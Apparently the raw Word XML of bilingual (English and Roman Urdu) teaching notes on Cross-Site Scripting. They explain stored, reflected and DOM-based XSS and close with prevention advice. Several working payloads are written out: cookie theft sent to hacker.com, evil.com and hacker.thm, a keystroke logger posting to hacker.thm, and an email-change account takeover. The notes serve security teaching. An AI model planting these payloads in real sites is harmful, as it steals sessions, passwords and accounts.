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</w:pP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Hello! Class is in session. Think of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:b/>
          <w:bCs w:val="false"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Cross-Site Scripting (XSS)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a "digital prank" gone wrong. In a normal world, when you visit a website, the server sends you code that your browser trusts. XSS happens when a hacker "injects" their own malicious script into a legitimate website, tricking your browser into running it as if it belonged there.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The core issue is a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:b/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>lack of input validation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>: the website takes what a user types and displays it back to the page without checking if it contains dangerous code.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1. The Three Main Types of XSS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Not all XSS attacks work the same way. We generally categorize them into three buckets based on how the "poison" is delivered.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A. Stored XSS (Persistent)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This is the most dangerous type. The malicious script is permanently stored on the target server (e.g., in a database, a comment field, or a user profile). Anyone who views the affected page gets "infected."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Scenario:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> A hacker leaves a comment on a blog.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Payload:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> Instead of "Nice post!", they type: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left="0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&lt;script&gt;document.location='http://hacker.com/steal?cookie=' + document.cookie&lt;/script&gt;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Result:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> Every single person who reads that blog post will have their session cookies sent to the hacker's server automatically.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B. Reflected XSS (Non-Persistent)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The script is "reflected" off the web server to the victim. It isn't stored; it’s delivered via a link. The victim must click a specially crafted URL for the attack to work.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Scenario:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> A search page displays your query: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:i/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>"You searched for: [your term]"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40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Payload:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> The hacker sends you a link that looks like this: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left="0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https://bank.com/search?q=&lt;script&gt;alert('Hacked!')&lt;/script&gt;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Result:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> When you click the link, the bank's website takes that script from the URL and puts it directly onto the page. Your browser runs it.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C. DOM-based XSS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This is a more modern version. The vulnerability exists entirely in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:b/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>client-side code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> (JavaScript) rather than the server-side code. The server never even sees the malicious script; it stays in the browser's Document Object Model (DOM).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Scenario:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> A site uses JavaScript to welcome you by name from the URL fragment (the part after the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40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Payload:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>https://site.com/welcome#&lt;script&gt;alert(window.location)&lt;/script&gt;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The Result:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> The page’s own JavaScript reads the script after the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> and executes it to "update" the page, bypassing many server-side security filters.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2. Practical Examples (The "How-To")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To understand the impact, let's look at what hackers actually do once they find a hole.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9"/>
        <w:gridCol w:w="7349"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr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Goal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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Example Payload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Session Hijacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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&lt;script&gt;fetch('https://evil.com/log?c=' + document.cookie);&lt;/script&gt;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Phishing / Defacement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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&lt;script&gt;document.body.innerHTML = '&lt;h1&gt;Site Under Maintenance. Login here: [Link]&lt;/h1&gt;';&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/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Keylogging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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script that records every keystroke the user types and sends it to a remote server.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3. How to Find Vulnerable Sites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Finding XSS is all about testing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:b/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Entry Points</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:b/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Exit Points</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>.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Step 1: Identify Input Fields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Look for anywhere a user can put data into the application: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Search bars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Contact forms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Login fields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URL parameters (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>?id=10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif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User profile settings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Step 2: The "Probe"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You don't start with a virus; you start with a "ping." Try entering a simple string of characters that shouldn't be there, like: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&lt;u&gt;Test&lt;/u&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>&lt;b&gt;Hello&lt;/b&gt;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 xml:space="preserve">If the word "Test" appears </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:b/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>underlined</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> or "Hello" appears </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:b/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>bold</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the page, the site is rendering HTML. This is a massive red flag.</w:t>
      </w:r>
    </w:p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Step 3: The Proof of Concept (PoC)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The classic test is the alert box. Use a payload like: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Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert(1)&lt;/script&gt;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If a popup box appears with the number "1" inside it, you have successfully executed an XSS attack.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uto" w:line="274" w:before="0" w:after="140"/>
        <w:ind w:hanging="0" w:left="0" w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans;sans-serif" w:hAnsi="Google Sans;sans-serif"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans;sans-serif" w:hAnsi="Google Sans;sans-serif"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>4. How to Prevent It (The Teacher's Summary)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:lineRule="auto" w:line="274" w:before="0" w:after="140"/>
        <w:ind w:hanging="0" w:left="0" w:right="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>As a developer, you have two golden rules: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Filter Input:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> Never trust user data. Strip out </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> tags or special characters.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left="709" w:right="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Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:b/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Encode Output:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> If you must display user data, convert it to a "safe" format. For example, convert </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>&amp;lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text;sans-serif" w:hAnsi="Google Sans Text;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>. This way, the browser displays the character but doesn't treat it as code.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  <w:t xml:space="preserve">Chalo is concept ko step by step </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif" w:hAnsi="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>as a teacher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  <w:t xml:space="preserve"> samajhtay hain, simple Roman Urdu mein, with practical examples.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1. Payload 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Simple baat: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Payload woh code hota hai jo attacker chahta hai ke victim ke browser mein run ho.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XSS (Cross-Site Scripting) mein payload usually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JavaScript code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hota hai.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Matlab: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vulnerable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apna code inject karta hai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Jab victim page open karta hai → woh code run ho jata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Real Life Analogy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= ek notice board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Normal user = apna message likhta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= apna “dangerous message” likhta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Payload = woh dangerous message jo kaam kare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Payload ke 2 Parts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Har payload ke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2 important parts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hote hain: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(1) Intention (Niyat)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Yeh batata hai ke attacker kya karna chahta hai.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Alert show karna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Cookies chori karna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Keys record karna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Account change karna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(2) Modification (Badlaav)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Har website same nahi hoti.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Is liye attacker ko apna code modify karna parta hai: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Kabhi </w:t>
      </w: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&lt;script&gt;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allowed hota hai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Kabhi filter hota hai → bypass karna parta hai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Kabhi HTML ke andar inject karna hota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Yani same kaam ke liye code thoda change hota rehta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XSS Payload Examples (Detail + Practical)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Ab hum har type ko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real scenario ke sath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samajhtay hain.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3.1 Proof of Concept (PoC)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Sabse simple payload.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Sirf yeh prove karna ke:</w:t>
        <w:br/>
        <w:t>"Yes, yahan XSS vulnerability exist karti hai"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Code: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Jab victim page open karega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Ek popup box ayega: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XSS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Practical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Ek website hai jahan comment box hai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 yeh likh dete ho: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0" w:name="code-block-viewer"/>
      <w:bookmarkEnd w:id="0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Agar popup aa jaye → matlab site vulnerable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Important Tip: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Yeh safe testing ke liye use hota hai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Real attack nahi, sirf proof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3.2 Session Stealing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User ka login session chori karna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Background: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Jab tum login karte ho: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tumhe ek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cookie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deti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Yeh cookie tumhari identity hoti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Agar koi cookie le le → woh tum ban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1" w:name="code-block-viewer_Copy_1"/>
      <w:bookmarkEnd w:id="1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fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));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by Step Samajh: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document.cookie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user ki cookies le raha hai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btoa()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encode kar raha hai (safe transfer ke liye)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fetch()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hacker ke server ko bhej raha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Practical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 Facebook jesi site use kar rahe ho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ne XSS inject kiya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Tum page open karte ho</w:t>
        <w:br/>
        <w:t>👉 Tumhari cookies hacker ke server pe chali jati hain</w:t>
        <w:br/>
        <w:t>👉 Hacker un cookies se login ho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Dangerous kyun?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Password ki zarurat nahi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Direct account access mil jata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3.3 Key Logger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User jo bhi type kare → attacker tak pohanch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2" w:name="code-block-viewer_Copy_2"/>
      <w:bookmarkEnd w:id="2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document.onkeypress = function(e) {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 xml:space="preserve"> </w:t>
      </w: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fetch('https://hacker.thm/log?key=' + btoa(e.key));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}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by Step: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onkeypress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har key press detect karta hai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e.key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kaunsi key press hui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fetch()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→ hacker ko bhej raha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Practical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 login page pe hai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Username aur password type kar raha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Har key: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r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1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2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3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Sab hacker ko mil raha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Real Danger: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Password chori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Credit card details leak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Private chats leak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3.4 Business Logic Attack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Specific website function ko misuse karna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3" w:name="code-block-viewer_Copy_3"/>
      <w:bookmarkEnd w:id="3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&lt;script&gt;user.changeEmail('attacker@hacker.thm');&lt;/script&gt;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Background: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Website ke andar functions hote hain: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4" w:name="code-block-viewer_Copy_4"/>
      <w:bookmarkEnd w:id="4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user.changeEmail()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Attack ka flow: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payload inject karta hai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Victim page open karta hai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JavaScript run hota hai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Email attacker ka ho jata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Practical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Tumhara account hai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 login ho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Suddenly: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Tumhara email change ho jata hai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password reset karta hai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Account hijack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Important Insight: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Yeh attack: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Simple nahi hota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ka logic samajhna parta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Important Points (Exam / Real World)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1. Har payload ka goal hota hai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Fun nahi, purpose hota hai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Cookies sabse important target hoti hain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Session hijacking easy hota hai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Simple alert bhi powerful hai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Kyunki vulnerability prove karta hai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Real attackers creative hote hain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Har site ke hisaab se payload change karte hain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5. Common Mistakes (Students yahan confuse hote hain)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Mistake 1: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Sochna ke payload sirf </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif" w:hAnsi="Google Sans Flex;Google Sans;Helvetica Neue;sans-serif"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert()&lt;/script&gt;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hota hai</w:t>
        <w:br/>
        <w:t>❌ Galat — yeh sirf PoC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Mistake 2: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Cookies kya hoti hain samajh na paana</w:t>
        <w:br/>
        <w:t>👉 Simple: login identity hoti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Mistake 3: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Har XSS same hota hai</w:t>
        <w:br/>
        <w:t>❌ Nahi — reflected, stored, DOM based alag hote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6. Short Summary (Roman Urdu)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Payload woh JavaScript code hota hai jo attacker victim ke browser mein run karwana chahta hai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Iske 2 parts hote hain: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intention (kya karna hai)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aur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modification (kaise karna hai)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Common payload types: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1418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PoC → sirf alert show karna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1418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Session stealing → cookies chori karna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1418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Keylogger → typing record karna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1418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Business logic → website ke function ka misuse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XSS dangerous hai kyunki attacker bina password ke account control le sakta hai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center"/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Google Sans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LibreOffice/25.8.4.2$Linux_X86_64 LibreOffice_project/580$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>14</Pages>
  <Words>1505</Words>
  <Characters>7367</Characters>
  <CharactersWithSpaces>8649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2026-04-03T12:47:16Z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